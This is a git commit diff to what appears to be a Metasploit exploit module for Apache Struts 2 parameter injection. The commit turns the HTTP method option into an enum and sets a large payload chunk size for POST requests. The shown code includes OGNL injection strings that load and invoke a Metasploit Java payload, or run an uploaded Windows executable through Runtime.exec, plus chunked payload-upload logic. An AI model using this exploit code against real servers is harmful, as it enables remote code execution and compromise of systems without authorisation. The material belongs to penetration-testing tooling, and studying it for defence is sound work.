Chunk length is now "huge" for POST method

Minor changes to the option text; changed HTTPMETHOD to an enum.
unstable
Console 2013-05-30 11:30:24 +01:00
parent ab6a2a049b
commit fb388c6463
1 changed files with 13 additions and 8 deletions


@ -68,9 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(8080),
OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',rand_text_alpha_lower(4)]),
OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/struts2-blank3/example/HelloWorld.action"]),
OptString.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET']),
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]),
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
], self.class)
end
@ -96,8 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
'version' => '1.1',
'method' => 'GET'
})
else
fail_with(Exploit::Failure::Unknown, "Invalid HTTP method, use GET or POST")
end
return resp #Used for check function.
end
@ -125,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
puts exec_cmd.length
when 'windows'
@payload_exe = "./#{@payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
@ -134,10 +133,16 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Preparing payload...")
#Now with all the arch specific stuff set, perform the upload.
#109 = length of command string plus the max length of append.
#109 = length of cmd string from "java_upload_part" method plus the max length of the boolean value append.
sub_from_chunk = 109 + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
case datastore['HTTPMETHOD']
when 'GET'
chunk_length = 2048 - sub_from_chunk
chunk_length = ((chunk_length/4).floor)*3
when 'POST'
chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about size.
end
while pl_exe.length > chunk_length
java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]